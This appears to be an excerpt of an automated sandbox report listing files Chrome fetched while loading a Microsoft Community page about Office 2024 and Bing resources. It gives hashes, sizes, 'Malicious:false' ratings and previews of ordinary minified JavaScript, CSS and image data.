                                                                            URL:https://answers.microsoft.com/en-us/msoffice/forum/all/where-do-i-go-to-download-and-purchase-office-2024/1641fc07-7cf2-43ea-9442-46452f5ae97a
                                                                            Preview:<!DOCTYPE html>........ 4CFF -->.. IzAqj4O22069eOqH.0-->....<html lang="en-US" class="no-js" dir="ltr">..<head>.. <title>Where do I go to download and purchase Office 2024 Pro Plus? - Microsoft Community</title>.. <link rel="stylesheet" href="https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&amp;_cf=02242021_3231" type="text/css" media="all" />.... <link media="all" href="https://answers-afd.microsoft.com/static/css/mwf/bundle/bundle.thread-view-mwfv3.1.0.4.354.min.css" rel="stylesheet" type="text/css" />.. <link media="all" href="https://answers-afd.microsoft.com/static/css/mwf/bundle/bundle.thread-list-no-kendo.1.0.4.354.min.css" rel="stylesheet" type="text/css" />.. <link media="all" href="https://answers-afd.microsoft.com/static/css/mwf2/moray-mwf2.main.1.0.4.354.min.css" rel="style
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (678), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):678
                                                                            Entropy (8bit):5.27994341520551
                                                                            Encrypted:false
                                                                            SSDEEP:12:eGBLK5Lud/zc+TbaVodQpdh93L/3QC+O1DepypTNQiZFrxbyRHHG:eGBoc/zcQ7odh93r/9D5pTNQ+FCHHG
                                                                            MD5:4D471610348B120B0DD752C4A8F5BF4C
                                                                            SHA1:F5DB5A2224D203615391D4B5D2ABE50C50692138
                                                                            SHA-256:C50D523A4995DA445CC646E358D53E2F881811A4043F7E287740C5FF2464C78B
                                                                            SHA-512:5F7AA4BF6AB8A86F0DDDBF3D8CB84EE841ED9F725846286545233614E01C4D2B8B8609BD984779699A19D0641CD9AE995C4773B83FAA49CE69B03FF611E8DB01
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/9dtaIiTSA2FTkdS10qvlDFBpITg.js
                                                                            Preview:var PaginationWithBFPRResults;(function(){function r(){var t,i,n,r;if(typeof webResultsUrls!="undefined"&&(t=document.querySelector("#b_results li.b_pag"),t))for(i=t.querySelectorAll("a.sb_bp"),n=0;n<i.length;n++)r=i[n],Lib.CssClass.contains(r,"sb_pag_first")||sj_be(r,"mousedown",u)}function u(){var r=f();sj_cook&&sj_cook.set(n,t,r,!1,"/");sj_cook&&sj_cook.set(n,i,_G.IG,!1,"/")}function f(){if(webResultsUrls.length===0)return"";var n;try{n=webResultsUrls.join(",");n=n===null||n===void 0?void 0:n.replace(/,/g,"%2C")}catch(t){throw new Error(t.message);}return n}var n="BFPRResults",t="FirstPageUrls",i="FPIG";r()})(PaginationWithBFPRResults||(PaginationWithBFPRResults={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1589
                                                                            Entropy (8bit):5.24528911504239
                                                                            Encrypted:false
                                                                            SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                            MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                            SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                            SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                            SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/No5xIZMVh9KdmI4bjLD9p4Xl0Ys.js
                                                                            Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1578), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1578
                                                                            Entropy (8bit):5.329734499973321
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QDoc8McY0tjLr4H5uRlcHeO0M2AieYIriev+OmbTkC6+xbDntex3CcldxQp3j7O:NfZuRy0N1eYZ0waSbO3CBp/GiCHAhG
                                                                            MD5:0C0AD3FD8C0F48386B239455D60F772E
                                                                            SHA1:F76EC2CF6388DD2F61ADB5DAB8301F20451846FA
                                                                            SHA-256:DB6DDE4AEF63304DF67B89F427019D29632345D8B3B5FE1B55980F5D78D6E1E7
                                                                            SHA-512:E45A51EF2F0021F168A70AC49BDCC7F4FB7B91FF0DDD931F8ECBD70F6494C56285B2D9BC1170804801CE178244CCF361745B677B04C388B608D1471E0695EBEB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function d(n,t){for(var r=[],i=0;i<t.length;i++)r.push({MonitorID:t[i].name,RequestID:t[i].guid,Result:Math.round(n[i])});return JSON.stringify(r)}function u(){function n(){return Math.floor((1+Math.random())*65536).toString(16).substring(1)}return n()+n()+n()+n()+n()+n()+n()+n()}function h(){return window.performance&&window.performance.getEntriesByName?!0:!1}function c(n,t,i,r,u,f){function l(i){var w,b,p,k,y,g,nt;if(e!=null&&sb_ct(e),s[i]=c!=null?(new Date).getTime()-c:-1,i=(a+v)%n.length,o=new Image,a++<n.length)c=(new Date).getTime(),o.onload=function(){l(i)},w=function(){o.onload=null;o.onerror=null;c=null;l(i)},e=sb_st(function(){w()},t),o.onerror=function(){e!=null&&sb_ct(e);e=null;w()},o.src=n[i];else{if(r!=null&&r.length!==0){if(h())for(y=0;y<n.length;y++)b=n[y],p=window.performance.getEntriesByName(b),s[y]!=-1&&p&&p[0]&&(s[y]=p[0].duration);for(k=d(s,u),y=0;y<r.length;y++)g=r[y],nt=new Image,nt.src=g+k}f!=null&&f()}}var c,e,s=[],v=Math.floor(Math.random()*n.lengt
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 220 x 220, 8-bit/color RGBA, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):48104
                                                                            Entropy (8bit):7.97636579582501
                                                                            Encrypted:false
                                                                            SSDEEP:768:Z2/UzXs2bvspcwIB4/icS7LSJJUtfPWqV8ly7bsxsS9KIyGryZXM9Bjdhan:Z2/GXs2Q+JcS7OJIPWqVK5sKKHUhdhan
                                                                            MD5:6D6A15AA64640B758BEB209C94620D07
                                                                            SHA1:02114FA9F03290727C2DBD3A899DC16B01B9BB25
                                                                            SHA-256:0C2A03C10B68F4C29EA25CB3D8D6BA673DA061EB16B5832032100123411351C9
                                                                            SHA-512:28A2C4F750A63EF7233226CA01539C2A102244C0CF05E6ABE1DA29F3616769C7E933DDF57A4C0CE63162378A638B8D19F61AD7F2254FB0B98DFE274850A77246
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://filestore.community.support.microsoft.com/api/profileimages/45fa9def-396a-41f0-85e3-b277de11471d
                                                                            Preview:.PNG........IHDR..............Z.....sRGB.........gAMA......a.....pHYs..........o.d...}IDATx^..x\...m.BK.$333333cbf.........3S.&.4......q.4...........93..g.{..-J....g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........g........c|..k..W.q...k.].......6..kD..E.f....!M..!!!.3d.0!].tCC3e.6m.F...\..."8f.'.....g..n.bK....s...{.......#G-.8q.nS....Xp.......;..a.._u...]'L..@....'.e..f..7.e...I..../.K.~....6...i.\...K.:.!^ON.*.....{&q.>.....j.?.3....t.R.IW.i.l..........w.....'>.o..7..X..M.M..f.?bs...y.O....l.O...?...'ZT...W.4..,$S&.9.e..2.X.igY8..%.;f..2qL.85...>.9.....wS.Is...x...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):76
                                                                            Entropy (8bit):4.613758804254278
                                                                            Encrypted:false
                                                                            SSDEEP:3:quwpTL0aDJd2AVFy1TqJmMM:quwZLkAftM
                                                                            MD5:E45559E064BE1CA6908E5725F042CAD0
                                                                            SHA1:427773F498E0C1C52641726DC7C8D7E6BA875F29
                                                                            SHA-256:8149EBBAB97636B492C4577E5D86B65001E672718BBD01218D8888B9989E7E4E
                                                                            SHA-512:F7B4C193C081C804B044F10AD705F2AA4F2C06671CDA0F898BB102F4DFFD77CEF09C18DEC5EFDC5F54F3CA9D11AB678E1A92A005581A340A8D8C43CCFB59D961
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var LGUtility;(function(n){n.enableCleanSerp=!0})(LGUtility||(LGUtility={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (35539), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):156915
                                                                            Entropy (8bit):5.294827222711773
                                                                            Encrypted:false
                                                                            SSDEEP:3072:mRktVPEwBzRWfArVqr6/xV+MwA9YrP8peRrzUHBxGHsfyp:mRVM8zUHBxGR
                                                                            MD5:0EFBA824BFEC029015CE89CA1861E2CB
                                                                            SHA1:550D5CDFDD796179E5D538F87043E532160039CA
                                                                            SHA-256:3808A0539F5E942C52ADAA45C2B021165A51E5E0056DDED7A34C119D4D1B3BCE
                                                                            SHA-512:894D9C64629D61B44CF27B8A189B51CDE1F50FE09A3DBCBEF8381F79157FB331468F70FCEA1B602D86F36BE4200E7077CFE89C1BFFD2DE498EE7D0E19305AD11
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/mwf2/moray-mwf2.bundle.1.0.4.354.min.js
                                                                            Preview:/*!.. * MWF (Moray) v2.13.0.. * Copyright (c) Microsoft Corporation. All rights reserved... * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc... * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang)... */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).mwf2={})}(this,(function(t){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},s=function(t){return t&&t.Math==Math&&t},i=s("object"==typeof globalThis&&globalThis)||s("object"==typeof window&&window)||s("object"==typeof self&&self)||s("object"==typeof e&&e)||function(){return this}()||Function("return this")(),n={},o=function(t){try{return!!t()}catch(t){return!0}},l=!o((function(){return 7!=Object.defineProperty({},1,{get:function(){return 7}})[1]})),r=!o((function(){var t
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8674
                                                                            Entropy (8bit):5.212727429542033
                                                                            Encrypted:false
                                                                            SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                            MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                            SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                            SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                            SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (417), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):417
                                                                            Entropy (8bit):5.156104263225177
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q+pkHXYqfRRO7UegY7knZUSFRO7UegY7knTZcnPsM:2QzRfOoeZwnZUSbOoeZwnTy1
                                                                            MD5:5F3115C3009AFF3032B00F3F31C28603
                                                                            SHA1:D9F5F57B2B591B345F2438935C326A24FB0B0399
                                                                            SHA-256:A487C62D5426112A6BBD972231976718299A30F38A2E56928334743DAFAB6419
                                                                            SHA-512:2511E1486A072F94A810385E3BDEE26FEBDA2823BE99EBBD67C7676B0DE36D504D0DBE00C40A2762440526D8F543C7B863BE12E41F10F82FA026AE1FAE8E3443
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/2fX1eytZGzRfJDiTXDJqJPsLA5k.js
                                                                            Preview:(function(){var i,r,u,f,n,t;_w.sj_log&&(f=_qs("input#sb_form_q"),n=_qs("textarea#sb_form_q"),f&&(t=(i=f.value)===null||i===void 0?void 0:i.length,sj_log("CI.SERPSB","CharCount",t.toString()),sj_log("CI.SERPSB","LandingRows","1")),n&&(t=(r=n.value)===null||r===void 0?void 0:r.length,sj_log("CI.SERPSB","CharCount",t.toString()),sj_log("CI.SERPSB","LandingRows",(u=n.rows)===null||u===void 0?void 0:u.toString())))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (674), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):674
                                                                            Entropy (8bit):5.239693493116514
                                                                            Encrypted:false
                                                                            SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                            MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                            SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                            SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                            SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1700), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1700
                                                                            Entropy (8bit):5.257735169047519
                                                                            Encrypted:false
                                                                            SSDEEP:24:2k7pl5aFCoMZLuZW+HTTvxOev3DAKBvADJqtLf9v1PYvzrRXsamQ0/knDfLjanX2:zTAIoauZ5tfUKIuvuvzty8nanQoA
                                                                            MD5:A35E7305B227D9877C8A9DB2B6CE44EC
                                                                            SHA1:8253154810F88704F8AD09B56111A432A0EF55ED
                                                                            SHA-256:C3174CDE987DCCE243B7FCD84AC88183B435360320162FD9AED6A5AC2C92A949
                                                                            SHA-512:0BE89A153B44060433DC37A9C9A3040904502252B831326BCA72D653983617D09B0DF6DA119B85D109BDEF60CE91011F4696F3902EC766D14B1F560AA530FC65
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rs/6r/rE/jnc,nj/6FCqOK6Ermw3dWCOaGGZscNXOjM.js?or=w"
                                                                            Preview:(function(n,t,i){function f(){!u.end&&s===a&&s>0&&i(w,0)}function o(n){if(n&&n.length)return r[n]||(r[n]={start:0,end:0,actual:0,done:0},s++),r[n]}function v(){var n=[];for(var t in r)r.hasOwnProperty(t)&&(n.push(t),u.actual+=r[t].actual);return n.sort(function(n,t){return r[t].actual-r[n].actual}),n}function y(){var f=[],e=0,t=v(),i,n,u;if(t.length>0)do if(i=t.shift(),n=r[i],!(n.start<_G.ST)){if(u='"'+i+'":{"S":'+(n.start-_G.ST)+',"E":'+(n.end-_G.ST)+',"T":'+n.actual+"}",e+=u.length+1,e>=d)break;f.push(u)}while(t.length>0);return f.join(",")}function p(){function i(n){return n=n.toString().replace(/\"/g,"'"),'"'+n+'"'}var r=[],t,n;for(t in e)e.hasOwnProperty(t)&&(n=e[t],typeof n!="number"&&(n=i(n)),r.push(i(t)+":"+n));return r.join(",")}function w(){u.end||(u.end=new Date,(new Image).src=_G.lsUrl+'&Type=Event.PPT&DATA={"S":'+(u.start-_G.ST)+',"E":'+(u.end-_G.ST)+',"T":'+u.actual+',"I":'+u.numInvalid+',"N":{'+y()+'},"M":{'+p()+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:""))}function
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2532), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2532
                                                                            Entropy (8bit):5.113813403595448
                                                                            Encrypted:false
                                                                            SSDEEP:48:KbbpCuxQwqtceDdWTAtE9OtsaZQkvp8gODtTis2ka0qgH5W/ggl+/W9P:gFJZqWeDHtrGcQSKgODtTZa0qgH5WogP
                                                                            MD5:10102E62E2B6E663ED22E989AF46C43E
                                                                            SHA1:1EDC8B99BCFB0CDFFFEAD624663D6C127B04398D
                                                                            SHA-256:FBFDBB1FE8B890CA294B4D46B4E747949D618B12BF0F9476553FDDE6C7A425E2
                                                                            SHA-512:104F2E4767C6E72E75ED009C13EEBE71349C3A28D01E7D972A3C5FE9B272DA0D94D9D09BFFC82411960755BABB52A9ACE12BAA8A1823D47687A70AE75001D885
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var WireUp,WireConnector,SignalConnector;(function(n){function f(n){var u=[],f,t,i,r,e;if(!n)return u;for(f=n.split(","),t=0;t<f.length;++t)(i=f[t],i&&0!==i.length)&&(r=i.split("/"),e={ci:r[0],cp:r[1],ct:r[2]},u.push(e));return u}function e(n){var t=n.split(";");return{type:t[0],name:t[1],cons:f(t[2])}}function o(n){for(var t,r,u={eps:{},w:!1,id:""},f=n.split("|"),i=0;i<f.length;++i)t=f[i],t&&t.length>0&&(r=e(t),u.eps[r.name]=r);return u}function s(n,t){for(var u=null,o=_d.querySelectorAll,r,f,e,u=o?o.call(_d,"["+n+"]"):_d.getElementsByTagName("*"),i=0;i<u.length;i++)r=u[i],f=r.getAttribute,f&&(e=f.call(r,n),e&&t(r,e))}function h(n,i,r,u){if(t.cis[i]){u.nodeHandler&&u.nodeHandler(i,n,r,t.cis[i]);return}t.cis[i]={};u.logicHandler(i,t.cis[i]);u.nodeHandler&&u.nodeHandler(i,n,r,t.cis[i])}function c(){t={nc:0,nodes:{},chs:{},ihs:{},cis:{}};n.g=t}function i(){var r="data-wire",n,i;s(r,function(n,i){n.id||(n.id="wire"+t.nc++);var u=o(i);u.id=n.id;t.nodes[n.id]=u;n.removeAttribute(r)});for(n
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (888), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):888
                                                                            Entropy (8bit):5.1970220185324045
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                            MD5:F1CF1909716CE3DA53172898BB780024
                                                                            SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                            SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                            SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1911), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1911
                                                                            Entropy (8bit):5.106590152829562
                                                                            Encrypted:false
                                                                            SSDEEP:24:NBI4jOHTDDiVQ/glIWue4cx7c9IHDKUcouvuFY7Ka5b:wqaDDNgFjeTaQKa5b
                                                                            MD5:9611C650C0535E6AF3E1EACFF0F5A707
                                                                            SHA1:618E96EA90C9457C4BF8D8EDC8F0A7D2FF99ADC5
                                                                            SHA-256:F7E1FDEDA028E8B0AE8530050CDE62758D762517409E0B030E2E34C4BFE3CB4A
                                                                            SHA-512:363D1C04B1BC3AEE043DD0A12D8DAB02ECC4FBBA312D20E7F1887729C41C8717295A3993ACB95EE405FA88E4FD9F32EF4895E5D48B3E54B6293806CFDC012887
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/YY6W6pDJRXxL-NjtyPCn0v-ZrcU.css
                                                                            Preview:.b_scopebar>ul li.b_hide{display:none}#b-scopeListItem-menu{vertical-align:initial;line-height:0;padding:3px 5px 0 5px;height:100%}#b-scopeListItem-menu svg{height:28px;width:18px;fill:#444;cursor:pointer}.b_scopebar.b_scope_dropdown_expanded{z-index:3}#b-scopeListItem-menu.focusin .b_sp_over_menu{transform:none;display:block;z-index:1002}#b-scopeListItem-menu .b_sp_over_menu{color:#444;cursor:pointer;transform:scale(0);display:none;position:absolute;background-color:#fff;border-radius:6px;padding:4px 0;margin:18px 0 0 -17px;box-shadow:0 4px 12px 1px rgba(0,0,0,.14);height:auto;overflow-y:unset;min-width:120px}#b-scopeListItem-menu .b_sp_over_item{font-weight:normal;font-size:13px;color:#444;text-align:left;padding:0 0 0 12px;margin:0;display:list-item}#b-scopeListItem-menu li.b_sp_over_item:hover{background:#f5f5f5;color:#111;border-bottom:none}#b-scopeListItem-menu .b_sp_over_item.divider{border-top:1px solid #ddd}#b-scopeListItem-menu .b_sp_over_item a{display:inline-block;width:100
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):235
                                                                            Entropy (8bit):4.950408993882282
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXAZCNHYLGQRXCNHEqECNXmX7GMn5HbRAAOYKxHJaNxsiSC5T:2QAZbGQB+E9nRdmYgJaYZS
                                                                            MD5:72EB59B535349EC6A1F05224731E1141
                                                                            SHA1:888CCDFE928F7D14B2CCFA896BA0BF6E8BF9F602
                                                                            SHA-256:E4B8926B77EB745BA926945450AE3A54F6E6D7E91871E0CB29D96B8036ACB1E1
                                                                            SHA-512:EB7875A0AB1B99C20286C2A6A2057F600583824FF2E36F619202C0F0A413C883BE6C7FE9BF7C534D580260F53FB9308464FDB41BE36A15A1BF321B3DEDA6BF69
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/iIzN_pKPfRSyzPqJa6C_bov59gI.js
                                                                            Preview:(function(){typeof ContextRegionPresent=="undefined"&&(ContextRegionPresent=!0);ContextRegionPresent&&sj_b!=null?(Lib.CssClass.remove(sj_b,"b_norr"),_w.sj_log&&sj_log("Info","HasRR","1")):sj_b!=null&&Lib.CssClass.add(sj_b,"b_norr")})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (663), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):663
                                                                            Entropy (8bit):4.541909055279269
                                                                            Encrypted:false
                                                                            SSDEEP:12:hZUSTZUC5f5GbJ/g/JwVbJwFtw3ZTmXJaga+ho9AJv1M4iAh6ZUSTZUC5f5GbJ/H:hFTVGbuKVGFG3AXSAjDiq6FTVGbuKVGY
                                                                            MD5:E9E2C4E0463686E60340B691512B2AED
                                                                            SHA1:2E5E7E4C42794ABE4E76045ECF8967AE33E62ABE
                                                                            SHA-256:00D26D9396D8237A3AE9C8B9508DB7B3FE86A9335E64FEB7E3C6F46DFF759A57
                                                                            SHA-512:22B02CE8971CA9E46CADC4A476DDB97ACA04FD90A7086419ECDE77D8439E399DF4154AE08677DA3EFB2F6024A3ED6819CEDC085496E67C3762CCC7AFAEC6A3A8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Ll5-TEJ5Sr5OdgRez4lnrjPmKr4.css
                                                                            Preview:.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_close:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.b_fLogo:after,.b_cm:after,.sw_lpoi:after{position:relative}.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_close:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.b_fLogo:after,.b_cm:after,.sw_lpoi:after{content:url(/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (766), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):766
                                                                            Entropy (8bit):5.203139850451521
                                                                            Encrypted:false
                                                                            SSDEEP:12:yWVV+7k6tzEXjBSLp9OXZ7jnuqTY+OPKfzKbFTCDfuwhlz+1q6poqQqSMyS75rgt:LVVwk6REXU9ONSqTYHPQwTCDuw61q6pI
                                                                            MD5:7BE60932F0676B35F83FBCFF69473A88
                                                                            SHA1:12EF061B866583A77B864C90C3B6C3EC6AA5721D
